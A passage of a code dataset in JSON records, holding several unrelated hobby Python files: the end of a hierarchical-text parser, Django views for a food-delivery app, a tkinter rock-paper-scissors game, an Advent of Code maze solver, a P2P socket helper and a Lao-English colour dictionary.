20:\n return text\n\n def get_name(self):\n text = self.get_text_without_marks_and_tags()\n if (text or SPACE)[0] == '(':\n closed_scope_position = text.find(') ')\n if closed_scope_position > 2:\n text = text[1: closed_scope_position]\n for divider in NAME_DIVIDERS:\n if divider in text:\n text = text.split(divider)[0]\n splitted_text = text.split(SPACE)\n if len(splitted_text) > MAX_WORDS_IN_NAME:\n text = SPACE.join(splitted_text[:MAX_WORDS_IN_NAME])\n text = text.lower()\n text.replace(SPACE, '_')\n text = transliterate(text)\n return text\n\n def get_content(self):\n text = self.get_text_without_marks_and_tags()\n name = self.has_name()\n if name:\n return text[len(name) + 3:]\n else:\n return text\n\n\nNative = Paragraph\n\n\nclass Tree(Paragraph):\n def __init__(\n self,\n 
text,\n level=0,\n name=None,\n subtrees=tuple(),\n ):\n Paragraph.__init__(self, text, level)\n self.name = name\n if subtrees:\n self.subtrees = list(subtrees)\n else:\n self.set_hiertext(text, including_title=True)\n\n def get_depth(self):\n max_depth = -1\n for subtree in self.subtrees:\n cur_depth = subtree.get_depth()\n if cur_depth > max_depth:\n max_depth = cur_depth\n return max_depth + 1\n\n def get_last_subtree(self):\n if self.subtrees:\n return self.subtrees[-1]\n\n def get_last_subtree_level(self):\n last_subtree = self.get_last_subtree()\n if last_subtree:\n return last_subtree.level\n\n def get_last_level(self):\n last_subtree_level = self.get_last_subtree_level()\n if last_subtree_level is not None:\n return last_subtree_level\n else:\n return self.level\n\n def get_mark(self, standard_only=True):\n return self.get_title_paragraph().get_mark(standard_only)\n\n def remove_commented_subtrees(self, markers=SKIP_MARKERS):\n for subtree in self.subtrees:\n if subtree.get_mark() in markers:\n self.subtrees.remove(subtree)\n print('removed:', subtree.get_title_paragraph().text)\n else:\n subtree.remove_commented_subtrees(markers)\n\n def add_paragraph(self, paragraph):\n last_subtree_level = self.get_last_subtree_level()\n if (last_subtree_level is not None) and (paragraph.level > last_subtree_level):\n last_subtree = self.get_last_subtree()\n last_subtree.add_paragraph(paragraph)\n else:\n new_subtree = Tree(paragraph.text, paragraph.level)\n self.subtrees.append(new_subtree)\n\n def add_line(self, text, level=0):\n paragraph = Paragraph(text, level)\n self.add_paragraph(paragraph)\n\n def add_dict_obj(self, obj: dict) -> Native:\n pass\n\n def add_yaml_text(self, lines: Iterable) -> Native:\n yaml_data = yaml.safe_load(lines)\n for obj in yaml_data:\n assert isinstance(obj, dict)\n self.add_dict_obj(obj)\n return self\n\n def add_hiertext(self, hiertext, replace_tab=True, skip_commented=True):\n for line in split_lines(hiertext):\n if replace_tab and line.startswith('\\t'):\n line = line.replace('\\t', SPACE * INDENT_STEP)\n self.add_line(line)\n if skip_commented:\n self.remove_commented_subtrees()\n\n def set_hiertext(self, hiertext, including_title=False):\n lines = list(split_lines(hiertext))\n if including_title:\n title = lines[0]\n self.text = title\n lines = lines[1:]\n self.subtrees = list()\n self.add_hiertext(lines)\n\n def get_title_text(self):\n return self.text\n\n def get_title_paragraph(self) -> Paragraph:\n return Paragraph(self.text, self.level)\n\n def get_hiertext(self):\n yield self.get_title_paragraph().get_line()\n for subtree in self.subtrees:\n for line in subtree.get_hiertext():\n yield line\n\n def get_subtrees_count(self):\n return len(self.subtrees)\n\n def get_lines_count(self):\n lines_count = 1\n for subtree in self.subtrees:\n lines_count += subtree.get_lines_count()\n return lines_count\n\n def get_paragraphs(self):\n yield self.get_title_paragraph()\n for subtree in self.subtrees:\n for paragraph in subtree.get_paragraphs():\n yield paragraph\n\n def get_markdown(self, rules=DEFAULT_RULES):\n for paragraph in self.get_paragraphs():\n markdown_lines = paragraph.get_markdown(rules)\n for line in markdown_lines:\n yield line\n\n @staticmethod\n def get_detected_doctype_by_filename(filename: str, default: Optional[str] = None) -> str:\n extension = filename.split('.')[-1]\n if extension in ('txt', 'yaml'):\n doctype = extension\n return doctype\n elif default:\n return default\n else:\n raise ValueError\n\n def from_file(self, filename: str, 
doctype: str = None) -> Native:\n if doctype is None:\n doctype = self.get_detected_doctype_by_filename()\n file_holder = open(filename, 'r', encoding='utf-8')\n if doctype == 'txt':\n self.add_hiertext(file_holder)\n elif doctype == 'yaml':\n self.add_yaml(file_holder)\n else:\n raise ValueError\n file_holder.close()\n return self\n\n def get_first_level_lines(self):\n for subtree in self.subtrees:\n yield subtree.get_title_paragraph()\n\n def get_item(self, as_link_from=None, link_type=cs.LinkType.Reference):\n cur = self.get_title_paragraph()\n tag = cur.get_tag()\n name = cur.get_name()\n caption = cur.get_content()\n titles = caption.split(' = ')\n print('Parsing row: [{}] ({}) \"{}\"'.format(tag, name, caption))\n item = cs.Node(name, titles=titles)\n for subtree in self.subtrees:\n assert isinstance(subtree, Tree)\n p = subtree.get_title_paragraph()\n p_marker = p.get_mark()\n p_tag = p.get_tag()\n p_name = p.get_name()\n p_text = p.get_content()\n print('....p_marker={}, p_tag={}, p_name={}, p_name={}'.format(p_marker, p_tag, p_name, p_text))\n if p_tag in ('parent', 'category', 'cat'):\n item.add_link_by_name(p_name, caption=p_text, link_type=cs.LinkType.Parent)\n elif p_marker == '=' or p_tag in ('child', 'children', 'struct', 'structure'):\n if p_text.endswith(':') or not p_text: # and subtree.get_depth() > 1:\n item.add_content_block(cs.Block(p_text, cs.BlockType.Struct))\n for element in subtree.subtrees:\n link = element.get_node(as_link_from=item, link_type=cs.LinkType.Child)\n item.add_content_item(link.copy(), block_type=cs.BlockType.Struct)\n else:\n link = subtree.get_item(as_link_from=item, link_type=cs.LinkType.Child)\n item.add_content_item(link.copy(), block_type=cs.BlockType.Struct)\n elif p_tag == 'usage':\n if p_text.endswith(':'): # and subtree.get_depth() > 1:\n for element in subtree.subtrees:\n e_name = element.get_name()\n e_text = element.get_content()\n item.add_link_by_name(e_name, e_text, link_type=cs.LinkType.Usage, create_node=True)\n else:\n item.add_link_by_name(p_name, p_text, link_type=cs.LinkType.Usage, create_node=True)\n else:\n for t in subtree.get_hiertext():\n item.add_content_item(t, block_type=cs.BlockType.Info)\n if as_link_from:\n link = cs.Link.build_link_from_nodes(as_link_from, item, link_type=link_type, caption=caption)\n return link\n else:\n return item\n\n# class Page(object):\n# # <...>\n# pass\n","repo_name":"az365/semadoc","sub_path":"hierdoc.py","file_name":"hierdoc.py","file_ext":"py","file_size_in_byte":11895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"9519162283","text":"import json\r\nfrom django.contrib.auth import authenticate, login, logout\r\nfrom django.db import IntegrityError\r\nfrom django.http import HttpResponse, HttpResponseRedirect, JsonResponse\r\nfrom django.shortcuts import render\r\nfrom django.urls import reverse\r\nfrom django.core.exceptions import ObjectDoesNotExist\r\nfrom django.core.paginator import Paginator\r\nfrom django.contrib.auth.decorators import login_required\r\nfrom django.template.defaulttags import register\r\nfrom django.db.models import Sum\r\n\r\nfrom client_app.models import Old_orders, User, Cart\r\nfrom deliveryperson_app.models import Order\r\nfrom restaurant_app.models import Food\r\n\r\n\r\n@register.filter\r\ndef usd(value):\r\n \"\"\"Format value as USD.\"\"\"\r\n return f\"${value:,.2f}\"\r\n\r\n\r\ndef index(request):\r\n if request.user.is_authenticated:\r\n return 
HttpResponseRedirect(reverse(\"client_app:home\"))\r\n return render(request, \"client_app/index.html\")\r\n\r\n\r\n@login_required(login_url='/login')\r\ndef home(request):\r\n\r\n # check if user is restaurant\r\n if request.user.is_restaurant is True:\r\n return HttpResponseRedirect(reverse(\"restaurant_app:index\"))\r\n\r\n # check if user is deliveryperson\r\n if request.user.is_deliveryperson is True:\r\n return HttpResponseRedirect(reverse(\"deliveryperson_app:index\"))\r\n\r\n # get all restaurants\r\n restaurantss = User.objects.filter(is_restaurant=True, is_superuser=False)\r\n paginator = Paginator(restaurantss, 12)\r\n page_number = request.GET.get('page')\r\n restaurants = paginator.get_page(page_number)\r\n\r\n return render(request, \"client_app/home.html\", {\r\n \"restaurants\": restaurants,\r\n })\r\n\r\n\r\n@login_required(login_url='/login')\r\ndef restaurant(request, res):\r\n\r\n # check if user is client\r\n if request.user.is_client is False:\r\n return render(request, \"client_app/error.html\", {\r\n \"error\": \"U must be client to access this page\"\r\n })\r\n\r\n # check if restaurant exist\r\n try:\r\n restaurant = User.objects.get(username=res)\r\n except ObjectDoesNotExist:\r\n return render(request, \"client_app/error.html\", {\r\n \"error\": \"restaurant doesn't exist\"\r\n })\r\n\r\n # check if it's restaurant\r\n if restaurant.is_restaurant is False:\r\n return render(request, \"client_app/error.html\", {\r\n \"error\": \"restaurant doesn't exist\"\r\n })\r\n\r\n # get food\r\n food = Food.objects.filter(restaurant=restaurant)\r\n\r\n # render page with data\r\n return render(request, \"client_app/restaurant_page.html\", {\r\n \"food\": food,\r\n \"restaurant\": restaurant,\r\n })\r\n\r\n\r\n@login_required(login_url='/login')\r\ndef cart(request):\r\n\r\n # check if user is client\r\n if request.user.is_client is False:\r\n return JsonResponse({\"error\": \"You must be user to see cart items\"}, status=400)\r\n\r\n # get user cart\r\n cart = Cart.objects.filter(user=request.user)\r\n\r\n # get sum cart price\r\n sum_price_cart = cart.aggregate(Sum('sum_price'))['sum_price__sum']\r\n\r\n # render cart page with data\r\n return render(request, \"client_app/cart.html\", {\r\n \"cart\": cart,\r\n \"sum_price_cart\": sum_price_cart,\r\n })\r\n\r\n\r\n@login_required(login_url='/login')\r\ndef sum_cart(request):\r\n\r\n # check if user is client\r\n if request.user.is_client is False:\r\n return JsonResponse({\"error\": \"You must be user see cart sum\"}, status=400)\r\n\r\n # get sum of cart\r\n sum_cart = Cart.objects.filter(user=request.user).aggregate(Sum('n'))['n__sum']\r\n\r\n # if it's empty return 0\r\n if not sum_cart:\r\n sum_cart = 0\r\n\r\n # return sum_cart\r\n return JsonResponse({\"sum\": sum_cart}, status=201)\r\n\r\n\r\n@login_required(login_url='/login')\r\ndef add_cart(request, food_id):\r\n\r\n # make sure request method post\r\n if request.method != \"POST\":\r\n return JsonResponse({\"error\": \"POST request required.\"}, status=400)\r\n\r\n # check if user is client\r\n if request.user.is_client is False:\r\n return JsonResponse({\"error\": \"You must be user to add items to cart\"}, status=400)\r\n\r\n # check if there's n\r\n data = json.loads(request.body)\r\n nn = [n.strip() for n in data.get(\"n\").split(\",\")]\r\n\r\n # if it's empty return error\r\n if nn == [\"\"]:\r\n return JsonResponse({\"error\": \"Must Provide Post n\"}, status=400)\r\n\r\n # get n\r\n n = data.get(\"n\", \"\")\r\n\r\n # make sure n and food_id is 
number\r\n if str(n).isdigit() is False or str(food_id).isdigit() is False:\r\n return JsonResponse({\"error\": f\"Error1\"}, status=400)\r\n \r\n n = int(n)\r\n food_id = int(food_id)\r\n\r\n # make sure n and food_id is not 0\r\n if n == 0 or food_id == 0:\r\n return JsonResponse({\"error\": \"Error2\"}, status=400)\r\n\r\n # make sure food exist\r\n try:\r\n food = Food.objects.get(pk=food_id)\r\n except ObjectDoesNotExist:\r\n return JsonResponse({\"error\": \"food doesn't exist\"}, status=400)\r\n\r\n # get user cart\r\n cart = Cart.objects.filter(user=request.user)\r\n\r\n # calculate sum\r\n sum_price = round(food.price * n, 2)\r\n\r\n # if item already in cart update n and sum\r\n try:\r\n in_cart = Cart.objects.get(user=request.user, item=food)\r\n in_cart.n = in_cart.n + n\r\n in_cart.sum_price = in_cart.sum_price + sum_price\r\n in_cart.save()\r\n return JsonResponse({\"success\": \"Added successfully\"}, status=201)\r\n except ObjectDoesNotExist:\r\n pass\r\n\r\n # if cart is empty add item to it\r\n if not cart:\r\n\r\n # add item to db\r\n item = Cart(user=request.user, item=food, n=n, sum_price=sum_price)\r\n item.save()\r\n\r\n # return success\r\n return JsonResponse({\"success\": \"Added successfully\"}, status=201)\r\n \r\n # if cart is not empty check if the item from the same restaurant\r\n else:\r\n\r\n # check\r\n if cart.first().item.restaurant.id != food.restaurant.id:\r\n return JsonResponse({\"error\": \"All items in cart must be from the same restaurant.\"}, status=400)\r\n\r\n # add item to db\r\n item = Cart(user=request.user, item=food, n=n, sum_price=sum_price)\r\n item.save()\r\n\r\n # return success\r\n return JsonResponse({\"success\": \"Added successfully\"}, status=201)\r\n\r\n\r\n@login_required(login_url='/login')\r\ndef update_cart(request, cart_id):\r\n\r\n # make sure request method post\r\n if request.method != \"POST\":\r\n return JsonResponse({\"error\": \"POST request required.\"}, status=400)\r\n \r\n # check if user is client\r\n if request.user.is_client is False:\r\n return JsonResponse({\"error\": \"You must be user to update items in cart\"}, status=400)\r\n\r\n # check if there's n\r\n data = json.loads(request.body)\r\n nn = [n.strip() for n in data.get(\"n\").split(\",\")]\r\n\r\n # if it's empty return error\r\n if nn == [\"\"]:\r\n return JsonResponse({\"error\": \"Must Provide Post n\"}, status=400)\r\n\r\n # get n\r\n n = data.get(\"n\", \"\")\r\n\r\n # make sure n and cart_id is number\r\n if str(n).isdigit() is False or str(cart_id).isdigit() is False:\r\n return JsonResponse({\"error\": f\"Error1\"}, status=400)\r\n\r\n n = int(n)\r\n cart_id = int(cart_id)\r\n\r\n # make sure n and cart_id is not 0\r\n if n == 0 or cart_id == 0:\r\n return JsonResponse({\"error\": \"Error2\"}, status=400)\r\n\r\n # make sure cart item exist\r\n try:\r\n cart_item = Cart.objects.get(pk=cart_id)\r\n except ObjectDoesNotExist:\r\n return JsonResponse({\"error\": \"food is not in cart\"}, status=400)\r\n\r\n # calculate sum\r\n sum_price = round(cart_item.item.price * n, 2)\r\n\r\n # update db\r\n cart_item.n = n\r\n cart_item.sum_price = sum_price\r\n cart_item.save()\r\n\r\n # get sum of cart\r\n sum_cart = Cart.objects.filter(user=request.user).aggregate(Sum('sum_price'))['sum_price__sum']\r\n\r\n # return success\r\n return JsonResponse({\"success\": \"Updated successfully\", \"sum_cart\": sum_cart, \"sum_price\": usd(cart_item.sum_price)}, status=201)\r\n\r\n\r\n@login_required(login_url='/login')\r\ndef remove_cart(request, cart_id):\r\n\r\n 
# make sure request method post\r\n if request.method != \"POST\":\r\n return JsonResponse({\"error\": \"POST request required.\"}, status=400)\r\n\r\n # check if user is client\r\n if request.user.is_client is False:\r\n return JsonResponse({\"error\": \"You must be user to delete items from cart\"}, status=400)\r\n\r\n # make cart_id is number\r\n if str(cart_id).isdigit() is False:\r\n return JsonResponse({\"error\": f\"Error1\"}, status=400)\r\n\r\n cart_id = int(cart_id)\r\n\r\n # cart_id is not 0\r\n if cart_id == 0:\r\n return JsonResponse({\"error\": \"Error2\"}, status=400)\r\n\r\n # make sure cart item exist\r\n try:\r\n cart_item = Cart.objects.get(pk=cart_id)\r\n except ObjectDoesNotExist:\r\n return JsonResponse({\"error\": \"food is not in cart\"}, status=400)\r\n\r\n # delete from db\r\n cart_item.delete()\r\n\r\n # get sum of cart\r\n sum_cart = Cart.objects.filter(user=request.user).aggregate(Sum('n'))['n__sum']\r\n\r\n # if cart is empty return 0\r\n if not sum_cart:\r\n sum_cart = 0\r\n\r\n # return success\r\n return JsonResponse({\"success\": \"Removed successfully\", \"sum_cart\": sum_cart}, status=201)\r\n\r\n\r\n@login_required(login_url='/login')\r\ndef place_order(request):\r\n\r\n # make sure request method post\r\n if request.method != \"POST\":\r\n return render(request, \"client_app/error.html\", {\r\n \"error\": \"Request Error\"\r\n })\r\n \r\n # check if user is client\r\n if request.user.is_client is False:\r\n return render(request, \"client_app/error.html\", {\r\n \"error\": \"U must be client to access this page\"\r\n })\r\n\r\n # check if there is already order\r\n try:\r\n Order.objects.get(user=request.user)\r\n return render(request, \"client_app/error.html\", {\r\n \"error\": \"there is already order in pending please wait for order to end or cancel order if possible\"\r\n })\r\n except ObjectDoesNotExist:\r\n pass\r\n\r\n # get user cart\r\n cart = Cart.objects.filter(user=request.user)\r\n\r\n # check if cart is empty\r\n if not cart:\r\n return render(request, \"client_app/error.html\", {\r\n \"error\": \"Cart is empty\"\r\n })\r\n\r\n # get cart items and numbers\r\n items = cart.only(\"item\", \"n\")\r\n\r\n # create list for order\r\n order = []\r\n\r\n # loop through items and add the order to single list\r\n for i in items:\r\n order.append(f\"{i.n} {i.item.food}\")\r\n \r\n # make the list single big string with white space at the end\r\n order = \" - \".join(order)\r\n\r\n # get restaurant\r\n restaurant = items.first().item.restaurant\r\n\r\n # get sum price cart\r\n sum_price_cart = cart.aggregate(Sum('sum_price'))['sum_price__sum']\r\n\r\n # save order to db\r\n new_order = Order(restaurant=restaurant, user=request.user, order=order, sum_order=sum_price_cart)\r\n new_order.save()\r\n\r\n # empty the cart\r\n cart.delete()\r\n\r\n # redirect user to live order page\r\n return HttpResponseRedirect(reverse(\"client_app:live_order\"))\r\n\r\n\r\n@login_required(login_url='/login')\r\ndef live_order(request):\r\n \r\n # check if user is client\r\n if request.user.is_client is False:\r\n return render(request, \"client_app/error.html\", {\r\n \"error\": \"you must be client to access this page\"\r\n })\r\n\r\n # get order\r\n try:\r\n order = Order.objects.get(user=request.user)\r\n except ObjectDoesNotExist:\r\n # if there is no order assign order to none\r\n order = None\r\n \r\n # render page with data\r\n return render(request, \"client_app/order.html\", {\r\n \"order\": order\r\n })\r\n\r\n\r\n@login_required(login_url='/login')\r\ndef 
cancel_order(request):\r\n\r\n # make sure request method post\r\n if request.method != \"POST\":\r\n return render(request, \"client_app/error.html\", {\r\n \"error\": \"Request Error\"\r\n })\r\n\r\n # check if user is client\r\n if request.user.is_client is False:\r\n return render(request, \"client_app/error.html\", {\r\n \"error\": \"you must be client to access this page\"\r\n })\r\n\r\n\r\n # check if there is order\r\n try:\r\n order = Order.objects.get(user=request.user)\r\n except ObjectDoesNotExist:\r\n return render(request, \"client_app/error.html\", {\r\n \"message\": \"No order\"\r\n })\r\n\r\n\r\n # if order got accepted return error\r\n if order.is_active is True:\r\n return render(request, \"client_app/error.html\", {\r\n \"error\": \"You can't cancel order when accepted\"\r\n })\r\n \r\n # remove order from db\r\n else:\r\n order.delete()\r\n \r\n # redirect to same page\r\n return HttpResponseRedirect(reverse(\"client_app:live_order\"))\r\n\r\n\r\n@login_required(login_url='/login')\r\ndef old_orders(request):\r\n\r\n # check if user is client\r\n if request.user.is_client is False:\r\n return render(request, \"client_app/error.html\", {\r\n \"error\": \"you must be client to access this page\"\r\n })\r\n\r\n # get old orders\r\n old_orders = Old_orders.objects.filter(user=request.user)\r\n\r\n # render template with data\r\n return render(request, \"client_app/old_orders.html\", {\r\n \"old_orders\": old_orders,\r\n })\r\n\r\n\r\ndef login_view(request):\r\n if request.method == \"POST\":\r\n\r\n # Attempt to sign user in\r\n username = request.POST[\"username\"]\r\n password = request.POST[\"password\"]\r\n user = authenticate(request, username=username, password=password)\r\n\r\n # Check if authentication successful\r\n if user is not None:\r\n\r\n # check if user is client\r\n if user.is_client is False:\r\n return render(request, \"client_app/error.html\", {\r\n \"error\": \"U must be client to login\"\r\n })\r\n \r\n login(request, user)\r\n return HttpResponseRedirect(reverse(\"client_app:home\"))\r\n else:\r\n return render(request, \"client_app/login.html\", {\r\n \"message\": \"Invalid username and/or password.\"\r\n })\r\n else:\r\n return render(request, \"client_app/login.html\")\r\n\r\n\r\ndef logout_view(request):\r\n logout(request)\r\n return HttpResponseRedirect(reverse(\"client_app:index\"))\r\n\r\n\r\ndef register(request):\r\n if request.method == \"POST\":\r\n\r\n # get inputs from user\r\n username = request.POST[\"username\"]\r\n email = request.POST[\"email\"]\r\n address = request.POST[\"address\"]\r\n image = request.POST.get(\"image\", \"\")\r\n number = request.POST[\"number\"]\r\n\r\n # errors cheking\r\n if not username or not email or not address or not number:\r\n return render(request, \"client_app/register.html\", {\r\n \"message\": \"Must fill all fields except image\"\r\n })\r\n\r\n if image:\r\n if len(image) > 200:\r\n return render(request, \"client_app/register.html\", {\r\n \"message\": \"Image url is too long\"\r\n })\r\n\r\n # Ensure password matches confirmation\r\n password = request.POST[\"password\"]\r\n confirmation = request.POST[\"confirmation\"]\r\n if password != confirmation:\r\n return render(request, \"client_app/register.html\", {\r\n \"message\": \"Passwords must match.\"\r\n })\r\n\r\n # Attempt to create new user\r\n try:\r\n if image:\r\n user = User.objects.create_user(username, email, password)\r\n user.address = address\r\n user.image = image\r\n user.number = number\r\n user.is_client = True\r\n else:\r\n 
user = User.objects.create_user(username, email, password)\r\n user.address = address\r\n user.number = number\r\n user.is_client = True\r\n user.save()\r\n except IntegrityError:\r\n return render(request, \"client_app/register.html\", {\r\n \"message\": \"Username already taken.\"\r\n })\r\n login(request, user)\r\n return HttpResponseRedirect(reverse(\"client_app:home\"))\r\n else:\r\n return render(request, \"client_app/register.html\")\r\n","repo_name":"OsamahAj1/food_delivery","sub_path":"client_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":16174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"38134010470","text":"import tkinter\nfrom tkinter import ttk, messagebox\nfrom random import randrange\n\nfirst_play = True\nlast_game = 2\nroot = tkinter.Tk()\ncomputer_choice = 0\n\ndifficulty_choice = messagebox.askyesno(title = \"Difficulty Choice\", message = \"Activate Hard Mode?\")\n\nratio = [0, 0, 0] #wins, losses, ties\ncomputer_choices = {1: \"rock\", 2: \"paper\", 0: \"scissors\"}\ninterface = ttk.Label(root, text = \"Press a Button!\")\nratio_label = ttk.Label(root, text = \"This label will show your W/L ratio.\")\ncomputer_label = ttk.Label(root, text = \"This label will show what the computer chooses.\")\n\ndef choice(number):\n global first_play\n global last_game\n global computer_choice\n if difficulty_choice == False or first_play == True or last_game == 2:\n computer_choice = randrange(1, 4)\n computer_label.config(text = \"Computer chose: \" + computer_choices[int((computer_choice + 1) % 3)])\n print(computer_choice)\n if (computer_choice % 3) == number:\n interface.config(text = \"It's a tie!\")\n ratio[2] += 1\n last_game = 2\n elif (computer_choice % 3) == (number - 1):\n interface.config(text = \"You win!\")\n ratio[0] += 1\n last_game = 0\n computer_choice += 1\n else:\n interface.config(text = \"You lose!\")\n ratio[1] += 1\n last_game = 1\n computer_choice += 2\n ratio_label.config(text = \"Wins: \" + str(ratio[0]) + \" Losses: \" + str(ratio[1]) + \" Ties: \" + str(ratio[2]))\n first_play = False\n\nRock = ttk.Button(root, text = \"Rock!\", command = lambda: choice(0))\nPaper = ttk.Button(root, text = \"Paper!\", command = lambda: choice(1))\nScissors = ttk.Button(root, text = \"Scissors!\", command = lambda: choice(2))\n\ncomputer_label.grid(row = 1, column = 0, columnspan = 3, stick = \"nsew\")\ninterface.grid(row = 0, column = 0, columnspan = 3, stick = \"nsew\")\nratio_label.grid(row = 2, column = 0, columnspan = 3, stick = \"nsew\")\nRock.grid(row = 3, column = 0)\nPaper.grid(row = 3, column = 1)\nScissors.grid(row = 3, column = 2)\nroot.mainloop()","repo_name":"danielkim0-highschool/Assorted-Python-Projects","sub_path":"RPS.py","file_name":"RPS.py","file_ext":"py","file_size_in_byte":2018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"4259472531","text":"from collections import deque\n\n# (x+y)*(x+y) = x*x + 2*x*y + y*y\n# f(x, y) = x*x + 3*x + 2*x*y + y + y*y = (x+y)**2 + 3*x + y\n#\n# f(x+1, y) = (x+y+1)**2 + 3*(x+1) + y\n# = (x+y)**2 + 2*(x+y) + 1 + 3*x + 3 + y\n# = (x+y)**2 + 3*x + y + 2*(x+y) + 4\n# = f(x, y) + 2*(x+y+2)\n#\n# => f(x, y) = f(x+1, y) - 2*(x+y+2)\n# => f(x-1, y) = f(x, y) - 2*(x+y+1)\n#\n# f(x, y+1) = (x+y+1)**2 + 3*x + y + 1\n# = (x+y)**2 + 2*(x+y) + 1 + 3*x + y + 1\n# = (x+y)**2 + 3*x + y + 2*(x+y) + 2\n# = f(x, y) + 2*(x+y+1)\n#\n# => f(x, y) = f(x, y+1) - 2*(x+y+1)\n# => f(x, y-1) = 
f(x, y) - 2*(x+y)\n\ndef f_xy(x, y):\n\treturn x*x + 3*x + 2*x*y + y + y*y\n\ndef solve(n, start_xy, end_xy=None):\n\tbits = {}\n\tseen = set()\n\n\tq = deque()\n\tq.append((0, *start_xy, n + f_xy(*start_xy)))\n\n\twhile q:\n\t\tsteps, x, y, n = q.popleft()\n\n\t\toddbits = bits.get(n)\n\t\tif oddbits is None:\n\t\t\toddbits = False\n\t\t\tm = n\n\t\t\twhile m:\n\t\t\t\tm &= m - 1\n\t\t\t\toddbits = not oddbits\n\t\t\tbits[n] = oddbits\n\t\tif oddbits:\n\t\t\tcontinue\n\n\t\txy = (x, y)\n\t\tif xy in seen:\n\t\t\tcontinue\n\t\tseen.add(xy)\n\n\t\tif end_xy:\n\t\t\tif xy == end_xy:\n\t\t\t\treturn steps\n\t\telif steps == 50:\n\t\t\tcontinue\n\n\t\tsteps += 1\n\t\txy = 2*(x+y)\n\n\t\tq.append((steps, x+1, y, n+xy+4))\n\t\tq.append((steps, x, y+1, n+xy+2))\n\t\tif y: q.append((steps, x, y-1, n-xy))\n\t\tif x: q.append((steps, x-1, y, n-xy-2))\n\n\treturn None if end_xy else len(seen)\n\ndef main():\n\tprint('Example Part 1:', solve(10, (1, 1), (7, 4)))\n\tprint('Example Part 2:', solve(10, (1, 1)))\n\tprint('Part 1:', solve(1352, (1, 1), (31, 39)))\n\tprint('Part 2:', solve(1352, (1, 1)))\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"nightjuggler/aoc","sub_path":"2016/13.py","file_name":"13.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"5829835441","text":"\nfrom Packet import Packet, PacketType\nimport socket\n\nLOG_LEVEL = 2\t# higher number -> more log\nMSG_SIZE = 1024\n\nclass bcolors:\n\tPINK = '\\033[95m'\n\tBLUE = '\\033[94m'\n\tCYAN = '\\033[96m'\n\tGREEN = '\\033[92m'\n\tORANGE = '\\033[93m'\n\tRED = '\\033[91m'\n\tNORMAL = '\\033[0m'\n\tBOLD = '\\033[1m'\n\tUNDERLINE = '\\033[4m'\n\ndef dprint(*args, level=1):\n\tif LOG_LEVEL >= level:\n\t\tif level == 1:\n\t\t\tprint(bcolors.GREEN, *args, bcolors.NORMAL)\n\t\telif level == 2:\n\t\t\tprint(bcolors.BLUE, *args, bcolors.NORMAL)\n\t\telse:\n\t\t\tprint(bcolors.PINK, *args, bcolors.NORMAL)\n\nclass BaseSenderReceiver:\n\tdef send(self, socket: socket.SocketType, msg, addr=None):\n\t\tdprint(f\"Send message to peer {addr if addr else socket.getpeername()} msg: {msg}\", level=2)\n\t\tmsg = msg.encode(\"ascii\")\n\t\tif not addr:\n\t\t\tsocket.send(msg)\n\t\telse:\n\t\t\tsocket.sendto(msg, addr)\n\n\tdef receive(self, socket: socket.SocketType):\n\t\tmsg = socket.recv(MSG_SIZE).decode(\"ascii\")\n\t\tmsg = msg.strip()\n\t\tif msg:\n\t\t\tdprint(f\"Got message from peer {socket.getpeername()}: {msg}\")\n\t\treturn msg\n\n\tdef send_packet(self, socket: socket.SocketType, packet: Packet, addr=None):\t\n\t\tself.send(socket, packet.__str__(), addr)\n\n\tdef receive_packet(self, socket) -> Packet:\n\t\tmsg = self.receive(socket)\n\t\tif not msg:\n\t\t\treturn None\n\t\tsplited = msg.split('|')\n\t\tpacket = Packet(PacketType.get_packet_type_from_code(splited[0]), splited[1], splited[2], splited[3])\n\t\treturn packet\n\n\tdef receive_packet_udp(self, socket: socket.SocketType):\n\t\tmsg, address = socket.recvfrom(MSG_SIZE)\n\t\tif not msg:\n\t\t\treturn None\n\t\tmsg = msg.decode(\"ascii\")\n\t\tmsg = msg.strip()\n\t\tdprint(f\"Got message from peer {address}: {msg}\")\n\t\tsplited = msg.split('|')\n\t\tpacket = Packet(PacketType.get_packet_type_from_code(splited[0]), splited[1], splited[2], splited[3])\n\t\treturn packet, 
address\n","repo_name":"mahsaama/P2P-Network","sub_path":"commons.py","file_name":"commons.py","file_ext":"py","file_size_in_byte":1787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"29790214204","text":" \ndef col(w):\n color={'red' : 'ສິແດງ',\n 'green' : 'ສີຂຽວ',\n 'blue' : 'ສີຟ້າ',\n 'yellow':'ສີເຫຼືອງ',\n 'purple':'ສີມ່ວງ',\n 'black':'ສີດຳ',\n 'white':'ສີຂາວ',\n 'orange':'ສີສົ້ມ',\n 'pink':'ສີບົວ',\n 'gray':'ສີຂີ້ເຖົ່າ',\n 'brow':'ສີຕັບໝູ',\n 'cyan':'ສີທະເລ',}\n print(f'Translate : {color.get(w,\"Not found\")}')\ndef col2(w):\n colors = {'ສີແດງ': \"red\",\n 'ສີຂຽວ' : \"green\",\n 'ສີຟ້າ' : \"blue\",\n 'ສີເຫຼືອງ' : \"yellow\",\n 'ສີມ້ວງ' : \"purple\",\n 'ສີດຳ' : \"black\",\n 'ສີຂາວ' : \"white\",\n 'ສີສົ້ມ' : \"orange\",\n 'ສີບົວ' : \"pink\",\n 'ສີຊົມພູ': \"pink\",\n 'ສີຂີ້ເຖົ່າ' : \"gray\",\n 'ສີຕັບໝູ' : \"brow\",\n 'ສີທະເລ' : \"cyan\",}\n print(f'ແປ : {colors.get(w,\"ບໍ່ພົບຄຳວັບນີ້\")}')\nprint(\"Welcom to funny dictionary.\")\nch = input(\"ກົດ 1 ແປເປັນພາສາລາວ, press 2 for English to Lao : \")\nif ch == '1':\n word = input(\" ຄຳສັບທີ່ຕ້ອງການແປ: \")\n col2(word)\nelif ch == \"2\":\n word = input('Word to translate : ')\n col(word)\nelse:\n print('Error!! ')\n \n\n\n","repo_name":"LONGLAI007/PYTHON","sub_path":"dictionnaary2.py","file_name":"dictionnaary2.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} 